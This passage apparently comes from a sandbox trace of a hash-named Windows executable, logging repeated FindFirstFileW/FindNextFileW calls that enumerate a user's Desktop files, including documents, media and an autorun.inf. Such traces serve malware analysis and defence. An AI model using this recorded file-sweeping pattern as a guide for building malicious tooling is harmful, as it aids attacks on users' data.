ftCreationTime.dwLowDateTime=0x1cfa0da0, ftCreationTime.dwHighDateTime=0x1d7d73f, ftLastAccessTime.dwLowDateTime=0x2ce7c810, ftLastAccessTime.dwHighDateTime=0x1d7e662, ftLastWriteTime.dwLowDateTime=0x2ce7c810, ftLastWriteTime.dwHighDateTime=0x1d7e662, nFileSizeHigh=0x0, nFileSizeLow=0x16df9, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0298.057] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0298.057] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fb7f0, ftCreationTime.dwHighDateTime=0x1d7db33, ftLastAccessTime.dwLowDateTime=0x305a1bd0, ftLastAccessTime.dwHighDateTime=0x1d7dea9, ftLastWriteTime.dwLowDateTime=0x305a1bd0, ftLastWriteTime.dwHighDateTime=0x1d7dea9, nFileSizeHigh=0x0, nFileSizeLow=0xed9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0298.058] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8e1e30, ftCreationTime.dwHighDateTime=0x1d7da06, ftLastAccessTime.dwLowDateTime=0xd8e93720, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0xd8e93720, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x9ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0298.058] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa1e1c40, ftCreationTime.dwHighDateTime=0x1d7db21, ftLastAccessTime.dwLowDateTime=0x26937cb0, ftLastAccessTime.dwHighDateTime=0x1d7e22b, ftLastWriteTime.dwLowDateTime=0x26937cb0, ftLastWriteTime.dwHighDateTime=0x1d7e22b, nFileSizeHigh=0x0, nFileSizeLow=0x142c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp", cAlternateFileName="")) returned 1 [0298.058] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92f00f0, ftCreationTime.dwHighDateTime=0x1d7e70c, ftLastAccessTime.dwLowDateTime=0x48586ac0, ftLastAccessTime.dwHighDateTime=0x1d7e746, ftLastWriteTime.dwLowDateTime=0x48586ac0, ftLastWriteTime.dwHighDateTime=0x1d7e746, nFileSizeHigh=0x0, nFileSizeLow=0x12ecf, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0298.059] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb899930, ftCreationTime.dwHighDateTime=0x1d7e3df, ftLastAccessTime.dwLowDateTime=0x1bc21a10, ftLastAccessTime.dwHighDateTime=0x1d7e449, ftLastWriteTime.dwLowDateTime=0x1bc21a10, ftLastWriteTime.dwHighDateTime=0x1d7e449, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0298.059] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d4eab0, ftCreationTime.dwHighDateTime=0x1d7dd2c, ftLastAccessTime.dwLowDateTime=0x4f0c7a00, ftLastAccessTime.dwHighDateTime=0x1d7e6f6, ftLastWriteTime.dwLowDateTime=0x4f0c7a00, ftLastWriteTime.dwHighDateTime=0x1d7e6f6, nFileSizeHigh=0x0, nFileSizeLow=0x1787d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a", cAlternateFileName="")) returned 1 [0298.059] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b6ddf0, ftCreationTime.dwHighDateTime=0x1d7e686, ftLastAccessTime.dwLowDateTime=0xdda50770, ftLastAccessTime.dwHighDateTime=0x1d7e6b8, ftLastWriteTime.dwLowDateTime=0xdda50770, ftLastWriteTime.dwHighDateTime=0x1d7e6b8, nFileSizeHigh=0x0, nFileSizeLow=0x4e4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx", cAlternateFileName="L0CW~1.DOC")) returned 1 [0298.059] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60d2b20, ftCreationTime.dwHighDateTime=0x1d7e13f, ftLastAccessTime.dwLowDateTime=0x634edb40, ftLastAccessTime.dwHighDateTime=0x1d7e6f4, ftLastWriteTime.dwLowDateTime=0x634edb40, ftLastWriteTime.dwHighDateTime=0x1d7e6f4, nFileSizeHigh=0x0, nFileSizeLow=0x6057, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0298.060] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc396f90, ftCreationTime.dwHighDateTime=0x1d7dc64, ftLastAccessTime.dwLowDateTime=0xb8ec5480, ftLastAccessTime.dwHighDateTime=0x1d7de1e, ftLastWriteTime.dwLowDateTime=0xb8ec5480, ftLastWriteTime.dwHighDateTime=0x1d7de1e, nFileSizeHigh=0x0, nFileSizeLow=0x13cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0298.060] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8559540, ftCreationTime.dwHighDateTime=0x1d7e270, ftLastAccessTime.dwLowDateTime=0xeb453af0, ftLastAccessTime.dwHighDateTime=0x1d7e6de, ftLastWriteTime.dwLowDateTime=0xeb453af0, ftLastWriteTime.dwHighDateTime=0x1d7e6de, nFileSizeHigh=0x0, nFileSizeLow=0xeb56, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3", cAlternateFileName="")) returned 1 [0298.060] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359a59a0, ftCreationTime.dwHighDateTime=0x1d7e455, ftLastAccessTime.dwLowDateTime=0x775764e0, ftLastAccessTime.dwHighDateTime=0x1d7e64f, ftLastWriteTime.dwLowDateTime=0x775764e0, ftLastWriteTime.dwHighDateTime=0x1d7e64f, nFileSizeHigh=0x0, nFileSizeLow=0x16292, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0298.060] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc8d580, ftCreationTime.dwHighDateTime=0x1d7e6fb, ftLastAccessTime.dwLowDateTime=0xbdec11f0, ftLastAccessTime.dwHighDateTime=0x1d7e76f, ftLastWriteTime.dwLowDateTime=0xbdec11f0, ftLastWriteTime.dwHighDateTime=0x1d7e76f, nFileSizeHigh=0x0, nFileSizeLow=0x3621, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp", cAlternateFileName="")) returned 1 [0298.061] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd362020, ftCreationTime.dwHighDateTime=0x1d7e754, ftLastAccessTime.dwLowDateTime=0x709af980, ftLastAccessTime.dwHighDateTime=0x1d7e755, ftLastWriteTime.dwLowDateTime=0x709af980, ftLastWriteTime.dwHighDateTime=0x1d7e755, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0298.061] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28b5bac0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xc3fc26e0, ftLastAccessTime.dwHighDateTime=0x1d7de49, ftLastWriteTime.dwLowDateTime=0xc3fc26e0, ftLastWriteTime.dwHighDateTime=0x1d7de49, nFileSizeHigh=0x0, nFileSizeLow=0xe2c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg", cAlternateFileName="")) returned 1 [0298.061] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9514b0, ftCreationTime.dwHighDateTime=0x1d7e727, ftLastAccessTime.dwLowDateTime=0xa82e8ec0, ftLastAccessTime.dwHighDateTime=0x1d7e737, ftLastWriteTime.dwLowDateTime=0xa82e8ec0, ftLastWriteTime.dwHighDateTime=0x1d7e737, nFileSizeHigh=0x0, nFileSizeLow=0x114f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv", cAlternateFileName="")) returned 1 [0298.061] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbdf3170, ftCreationTime.dwHighDateTime=0x1d7d9ba, ftLastAccessTime.dwLowDateTime=0x61bc6a40, ftLastAccessTime.dwHighDateTime=0x1d7e037, ftLastWriteTime.dwLowDateTime=0x61bc6a40, ftLastWriteTime.dwHighDateTime=0x1d7e037, nFileSizeHigh=0x0, nFileSizeLow=0x18100, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4", cAlternateFileName="")) returned 1 [0298.062] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81ccee0, ftCreationTime.dwHighDateTime=0x1d7e3a3, ftLastAccessTime.dwLowDateTime=0xbe248520, ftLastAccessTime.dwHighDateTime=0x1d7e450, ftLastWriteTime.dwLowDateTime=0xbe248520, ftLastWriteTime.dwHighDateTime=0x1d7e450, nFileSizeHigh=0x0, nFileSizeLow=0xebfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0298.062] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e0bb40, ftCreationTime.dwHighDateTime=0x1d7d829, ftLastAccessTime.dwLowDateTime=0x603800f0, ftLastAccessTime.dwHighDateTime=0x1d7dcc5, ftLastWriteTime.dwLowDateTime=0x603800f0, ftLastWriteTime.dwHighDateTime=0x1d7dcc5, nFileSizeHigh=0x0, nFileSizeLow=0x43c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0298.062] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63377cb0, ftCreationTime.dwHighDateTime=0x1d7e254, ftLastAccessTime.dwLowDateTime=0xea3dd620, ftLastAccessTime.dwHighDateTime=0x1d7e3f6, ftLastWriteTime.dwLowDateTime=0xea3dd620, ftLastWriteTime.dwHighDateTime=0x1d7e3f6, nFileSizeHigh=0x0, nFileSizeLow=0x2061, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png", cAlternateFileName="")) returned 1 [0298.063] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d08e860, ftCreationTime.dwHighDateTime=0x1d7df82, ftLastAccessTime.dwLowDateTime=0x8ba89350, ftLastAccessTime.dwHighDateTime=0x1d7e736, ftLastWriteTime.dwLowDateTime=0x8ba89350, ftLastWriteTime.dwHighDateTime=0x1d7e736, nFileSizeHigh=0x0, nFileSizeLow=0x887b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0298.063] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0298.063] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 0 [0298.063] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.064] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.064] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0298.064] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1dfe10, ftCreationTime.dwHighDateTime=0x1d7d73d, ftLastAccessTime.dwLowDateTime=0x590d3ff0, ftLastAccessTime.dwHighDateTime=0x1d7de66, ftLastWriteTime.dwLowDateTime=0x590d3ff0, ftLastWriteTime.dwHighDateTime=0x1d7de66, nFileSizeHigh=0x0, nFileSizeLow=0x16800, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg", cAlternateFileName="")) returned 1 [0298.066] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1866520, ftCreationTime.dwHighDateTime=0x1d7df30, ftLastAccessTime.dwLowDateTime=0xd42ebbb0, ftLastAccessTime.dwHighDateTime=0x1d7e5db, ftLastWriteTime.dwLowDateTime=0xd42ebbb0, ftLastWriteTime.dwHighDateTime=0x1d7e5db, nFileSizeHigh=0x0, nFileSizeLow=0x7511, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0298.066] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0298.066] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd71272d6, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd8250b16, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf", cAlternateFileName="")) returned 1 [0298.066] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0298.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9a4740, ftCreationTime.dwHighDateTime=0x1d7e276, ftLastAccessTime.dwLowDateTime=0x19402410, ftLastAccessTime.dwHighDateTime=0x1d7e54f, ftLastWriteTime.dwLowDateTime=0x19402410, ftLastWriteTime.dwHighDateTime=0x1d7e54f, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0298.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63934470, ftCreationTime.dwHighDateTime=0x1d7e419, ftLastAccessTime.dwLowDateTime=0xbc7be2f0, ftLastAccessTime.dwHighDateTime=0x1d7e4b8, ftLastWriteTime.dwLowDateTime=0xbc7be2f0, ftLastWriteTime.dwHighDateTime=0x1d7e4b8, nFileSizeHigh=0x0, nFileSizeLow=0xa1bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc", cAlternateFileName="")) returned 1 [0298.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfa0da0, ftCreationTime.dwHighDateTime=0x1d7d73f, ftLastAccessTime.dwLowDateTime=0x2ce7c810, ftLastAccessTime.dwHighDateTime=0x1d7e662, ftLastWriteTime.dwLowDateTime=0x2ce7c810, ftLastWriteTime.dwHighDateTime=0x1d7e662, nFileSizeHigh=0x0, nFileSizeLow=0x16df9, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0298.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0298.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fb7f0, ftCreationTime.dwHighDateTime=0x1d7db33, ftLastAccessTime.dwLowDateTime=0x305a1bd0, ftLastAccessTime.dwHighDateTime=0x1d7dea9, ftLastWriteTime.dwLowDateTime=0x305a1bd0, ftLastWriteTime.dwHighDateTime=0x1d7dea9, nFileSizeHigh=0x0, nFileSizeLow=0xed9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0298.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8e1e30, ftCreationTime.dwHighDateTime=0x1d7da06, ftLastAccessTime.dwLowDateTime=0xd8e93720, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0xd8e93720, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x9ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0298.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa1e1c40, ftCreationTime.dwHighDateTime=0x1d7db21, ftLastAccessTime.dwLowDateTime=0x26937cb0, ftLastAccessTime.dwHighDateTime=0x1d7e22b, ftLastWriteTime.dwLowDateTime=0x26937cb0, ftLastWriteTime.dwHighDateTime=0x1d7e22b, nFileSizeHigh=0x0, nFileSizeLow=0x142c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp", cAlternateFileName="")) returned 1 [0298.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92f00f0, ftCreationTime.dwHighDateTime=0x1d7e70c, ftLastAccessTime.dwLowDateTime=0x48586ac0, ftLastAccessTime.dwHighDateTime=0x1d7e746, ftLastWriteTime.dwLowDateTime=0x48586ac0, ftLastWriteTime.dwHighDateTime=0x1d7e746, nFileSizeHigh=0x0, nFileSizeLow=0x12ecf, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0298.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb899930, ftCreationTime.dwHighDateTime=0x1d7e3df, ftLastAccessTime.dwLowDateTime=0x1bc21a10, ftLastAccessTime.dwHighDateTime=0x1d7e449, ftLastWriteTime.dwLowDateTime=0x1bc21a10, ftLastWriteTime.dwHighDateTime=0x1d7e449, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0298.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d4eab0, ftCreationTime.dwHighDateTime=0x1d7dd2c, ftLastAccessTime.dwLowDateTime=0x4f0c7a00, ftLastAccessTime.dwHighDateTime=0x1d7e6f6, ftLastWriteTime.dwLowDateTime=0x4f0c7a00, ftLastWriteTime.dwHighDateTime=0x1d7e6f6, nFileSizeHigh=0x0, nFileSizeLow=0x1787d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a", cAlternateFileName="")) returned 1 [0298.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b6ddf0, ftCreationTime.dwHighDateTime=0x1d7e686, ftLastAccessTime.dwLowDateTime=0xdda50770, ftLastAccessTime.dwHighDateTime=0x1d7e6b8, ftLastWriteTime.dwLowDateTime=0xdda50770, ftLastWriteTime.dwHighDateTime=0x1d7e6b8, nFileSizeHigh=0x0, nFileSizeLow=0x4e4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx", cAlternateFileName="L0CW~1.DOC")) returned 1 [0298.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60d2b20, ftCreationTime.dwHighDateTime=0x1d7e13f, ftLastAccessTime.dwLowDateTime=0x634edb40, ftLastAccessTime.dwHighDateTime=0x1d7e6f4, ftLastWriteTime.dwLowDateTime=0x634edb40, ftLastWriteTime.dwHighDateTime=0x1d7e6f4, nFileSizeHigh=0x0, nFileSizeLow=0x6057, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0298.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc396f90, ftCreationTime.dwHighDateTime=0x1d7dc64, ftLastAccessTime.dwLowDateTime=0xb8ec5480, ftLastAccessTime.dwHighDateTime=0x1d7de1e, ftLastWriteTime.dwLowDateTime=0xb8ec5480, ftLastWriteTime.dwHighDateTime=0x1d7de1e, nFileSizeHigh=0x0, nFileSizeLow=0x13cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0298.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8559540, ftCreationTime.dwHighDateTime=0x1d7e270, ftLastAccessTime.dwLowDateTime=0xeb453af0, ftLastAccessTime.dwHighDateTime=0x1d7e6de, ftLastWriteTime.dwLowDateTime=0xeb453af0, ftLastWriteTime.dwHighDateTime=0x1d7e6de, nFileSizeHigh=0x0, nFileSizeLow=0xeb56, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3", cAlternateFileName="")) returned 1 [0298.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359a59a0, ftCreationTime.dwHighDateTime=0x1d7e455, ftLastAccessTime.dwLowDateTime=0x775764e0, ftLastAccessTime.dwHighDateTime=0x1d7e64f, 